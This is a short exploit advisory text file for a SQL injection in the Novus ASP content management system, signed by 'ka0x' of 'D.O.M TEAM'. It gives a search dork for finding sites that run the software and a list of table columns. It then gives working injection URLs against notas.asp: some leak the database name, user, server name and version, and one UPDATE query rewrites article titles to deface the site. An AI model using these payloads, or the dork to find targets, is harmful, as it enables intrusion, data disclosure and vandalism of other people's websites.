novus-sql.txt

`Novus - Sistema de administracion y contenido.  
bug: Sql Inyection.  
official site: http://novus.com.mx  
d0rk: "Powered by Novus"  
free: no  
system: asp  
  
bug found by ka0x  
D.O.M TEAM  
we: ka0x, an0de, xarnuz, s0cratex  
ka0x01[at]gmail.com  
  
tables:  
  
1- a_nota.nota_id  
2- a_nota.fe_publicacion  
3- a_nota.seccion_id  
4- a_nota.sub_sec_id  
5- a_nota.estatus_id  
6- a_nota.fe_alta  
7- a_nota.usuario_id  
8- a_nota.ultima_hora  
9- a_nota.tema_id  
10- a_nota.autor  
11- a_nota.autor_id  
12- a_nota.titulo  
13- a_nota.resumen  
14- a_nota.texto  
15- a_nota.temporal  
  
informacion server:  
  
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,db_name())  
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,system_user)  
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@servername)--  
http://[novus]/notas.asp?nota_id=1+and+1=convert(int,@@version)--  
  
update table tutulo:  
  
http://[novus]/notas.asp?nota_id=0update+a_nota+set+titulo+=+'Novus Bug Sql Inyection'--  
  
#from spain  
--   
// ka0x  
`